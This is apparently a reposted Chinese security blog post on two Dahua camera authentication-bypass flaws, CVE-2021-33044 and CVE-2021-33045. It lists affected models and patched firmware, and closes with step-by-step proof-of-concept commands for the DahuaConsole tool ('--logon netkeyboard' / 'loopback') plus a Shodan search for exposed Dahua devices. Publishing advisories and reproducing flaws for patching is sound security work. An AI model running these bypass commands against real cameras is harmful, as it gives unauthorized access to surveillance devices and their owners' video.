大华摄像头 CVE-2021-33044-CVE-2021-33045 POC
2021-10-13 18:55:07 Author: mp.weixin.qq.com(查看原文) 阅读量:554 收藏
2021-10-13 18:55:07 Author: mp.weixin.qq.com(查看原文) 阅读量:554 收藏
大华摄像头 CVE-2021-33044-CVE-2021-33045 POC
CVE-2021-33044 and CVE-2021-33045.
CVE-2021-33044范围
| Affected Model | Affected Version | Fix Software |
|---|---|---|
| IPC-HX3XXX, HX5XXX, HUM7XXX | Versions which Build time before June,2021 | DH_IPC-HX3XXX-Leo_MultiLang_PN_Stream3_V2.800.0000000.29.R.210630 DH_IPC-HX3XXX-Leo_MultiLang_NP_Stream3_V2.800.0000000.29.R.210630 DH_IPC-HX3XXX-Dalton_MultiLang_NP_Stream3_V2.820.0000000.18.R.210705 DH_IPC-HX3XXX-Dalton_MultiLang_PN_Stream3_V2.820.0000000.18.R.210705 DH_IPC-HX5XXX-Volt_MultiLang_PN_Stream3_V2.820.0000000.5.R.210705 DH_IPC-HX5XXX-Volt_MultiLang_NP_Stream3_V2.820.0000000.5.R.210705 DH_IPC-HUM7XXX-E2-Volt_MultiLang_NP_V2.820.0000000.5.R.210705 DH_IPC-HUM7XXX-E2-Volt_MultiLang_PN_V2.820.0000000.5.R.210705 |
| VTO75X95X, VTO65XXX | DH_VTO75X95X_Eng_PN_SIP_V4.300.0000003.0.R.210714 DH_VTO65XXX_Eng_PN_V4.300.0000004.0.R.210715 | |
| VTH542XH | DH_VTH542XH_MultiLang_SIP_V4.500.0000002.0.R.210715 | |
| PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, SD6AL | DH_SD-Eos-Civil_MultiLang_PN_Stream3_V2.812.0000007.0.R.210706 DH_SD-Eos-Civil_MultiLang_NP_Stream3_V2.812.0000007.0.R.210706 DH_SD-Eos_MultiLang_PN_Stream3_V2.812.0000007.0.R.210706 DH_SD-Eos_MultiLang_NP_Stream3_V2.812.0000007.0.R.210706 | |
| Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, TPC-PT8X21B | DH_TPC-BF1241-TB_MultiLang_PN_V2.630.0000000.6.R.210707 DH_TPC-BF1241-TB_MultiLang_NP_V2.630.0000000.6.R.210707 DH_TPC-BF2221-TB_MultiLang_PN_V2.630.0000000.10.R.210707 DH_TPC-BF2221-TB_MultiLang_NP_V2.630.0000000.10.R.210707 DH_TPC-SD2221-TB_MultiLang_PN_V2.630.0000000.7.R.210707 DH_TPC-SD2221-TB_MultiLang_NP_V2.630.0000000.7.R.210707 DH_TPC-BF5X01-TB_MultiLang_PN_V2.630.0000000.12.R.210707 DH_TPC-BF5X01-TB_MultiLang_NP_V2.630.0000000.12.R.210707 DH_TPC-BF5X21-TB_MultiLang_PN_V2.630.0000000.8.R.210630 DH_TPC-BF5X21-TB_MultiLang_NP_V2.630.0000000.8.R.210630 DH_TPC-PT8X21A-TB_MultiLang_PN_V2.630.0000000.14.R.210630 DH_TPC-PT8X21A-TB_MultiLang_NP_V2.630.0000000.14.R.210630 DH_TPC-SD8X21-TB_MultiLang_PN_V2.630.0000000.9.R.210706 DH_TPC-SD8X21-TB_MultiLang_NP_V2.630.0000000.9.R.210706 DH_TPC-PT8X21B-B_MultiLang_PN_V2.630.0000000.10.R.210701 DH_TPC-PT8X21B-B_MultiLang_NP_V2.630.0000000.10.R.210701 |
CVE-2021-33045范围
| Affected Model | Affected Version | Fix Software |
|---|---|---|
| IPC-HX3XXX, HX5XXX, HUM7XXX | Versions which Build time before May,2020 | DH_IPC-HX3XXX-Leo_MultiLang_PN_Stream3_V2.800.0000000.29.R.210630 DH_IPC-HX3XXX-Leo_MultiLang_NP_Stream3_V2.800.0000000.29.R.210630 DH_IPC-HX3XXX-Dalton_MultiLang_NP_Stream3_V2.820.0000000.18.R.210705 DH_IPC-HX3XXX-Dalton_MultiLang_PN_Stream3_V2.820.0000000.18.R.210705 DH_IPC-HX5XXX-Volt_MultiLang_PN_Stream3_V2.820.0000000.5.R.210705 DH_IPC-HX5XXX-Volt_MultiLang_NP_Stream3_V2.820.0000000.5.R.210705 DH_IPC-HUM7XXX-E2-Volt_MultiLang_NP_V2.820.0000000.5.R.210705 DH_IPC-HUM7XXX-E2-Volt_MultiLang_PN_V2.820.0000000.5.R.210705 |
| VTO75X95X, VTO65XXX | Versions which Build time before December,2019 | DH_VTO75X95X_Eng_PN_SIP_V4.300.0000003.0.R.210714 DH_VTO65XXX_Eng_PN_V4.300.0000004.0.R.210715 |
| VTH542XH | DH_VTH542XH_MultiLang_SIP_V4.500.0000002.0.R.210715 | |
| NVR1XXX, NVR2XXX, NVR4XXX, NVR5XXX, NVR6XX | DH_NVR4XXX-I_MultiLang_V4.001.0000000.3.R.210710 DH_NVR4x-4KS2L_MultiLang_V4.001.0000001.0.R.210709 DH_NVR4XXX-4KS2_MultiLang_V4.001.0000005.1.R.210713 DH_NVR5XXX-4KS2_MultiLang_V4.001.0000006.1.R.210709 DH_NVR5XXX-I_MultiLang_V4.001.0000000.3.R.210710 DH_NVR5XXX-IL_MultiLang_V4.001.0000000.0.R.210710 DH_NVR1XHC-S3_MultiLang_V4.001.0000000.1.R.210710 DH_NVR2XXX-4KS2_MultiLang_V4.001.0000005.0.R.210709 DH_NVR2XXX-W-4KS2_MultiLang_V4.001.0000003.1.R.210709 DH_NVR2XXX-I2_Mul_V4.002.0000000.0.R.210709 DH_NVR2XXX-I_Mul_V4.001.0000000.1.R.210710 DH_NVR1XXX-S3H_MultiLang_V4.001.0000005.1.R.210709 DH_NVR6XX-4KS2_MultiLang_V4.001.0000001.1.R.210716 | |
| XVR4xxx, XVR5xxx, XVR7xxx | DH_XVR5x16-I2_MultiLang_V4.001.0000003.1.R.210710 DH_XVR7x16-I2_MultiLang_V4.001.0000003.1.R.210710 DH_XVR5x08-I2_MultiLang_V4.001.0000003.1.R.210710 DH_XVR5x04-I2_MultiLang_V4.001.0000003.1.R.210710 DH_XVR7x32-I2_MultiLang_V4.001.0000003.1.R.210710 DH_XVR5x08-I3_MultiLang_V4.001.0000000.15.R.210702 DH_XVR5x04-I3_MultiLang_V4.001.0000000.15.R.210702 DH_XVR4x08-I3_MultiLang_V4.001.0000000.15.R.210702 DH_XVR4x04-I_MultiLang_V4.001.0000001.1.R.210709 DH_XVR4x08-I_MultiLang_V4.001.0000001.1.R.210709 DH_XVR5x08-X_MultiLang_V4.001.0000000.9.R.210710 DH_XVR5x16-X_MultiLang_V4.001.0000000.9.R.210710 DH_XVR7x16-X_MultiLang_V4.001.0000000.9.R.210710 DH_XVR5x04-X1(2.0)_MultiLang_V4.001.0000000.14.R.210709 DH_XVR4x04-X1(2.0)_MultiLang_V4.001.0000000.14.R.210709 |
https://securityaffairs.co/wordpress/123076/hacking/dahua-cameras-flaws.html
https://www.bleepingcomputer.com/news/security/unpatched-dahua-cams-vulnerable-to-unauthenticated-remote-access
https://github.com/mcw0/DahuaConsole
https://www.dahuasecurity.com/support/cybersecurity/details/957
poc
https://github.com/mcw0/DahuaConsole
复现:
pip3 install -r requirements.txt
[CVE-2021-33044]Protocol needed: DHIP or HTTP/HTTPS (DHIP do not work with TLS/SSL @TCP/443)
[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000
[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80
[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443
[CVE-2021-33045]Protocol needed: DHIP (DHIP do not work with TLS/SSL @TCP/443)
[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000
[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80
漏洞细节
https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
复现成功截图:
https://www.shodan.io/search?query=Dahua
python3 ./Console.py --logon loopback --rhost ip --proto dhip --rport 5000
文章来源: http://mp.weixin.qq.com/s?__biz=MzI0Nzc0NTcwOQ==&mid=2247485101&idx=1&sn=d2271d54a951b7cfc41b57931d09d780&chksm=e9aa1b6fdedd9279ddc66995e6cec42207bfe3d181fa4b8e6ae760ae32d515aed0121f71de73#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh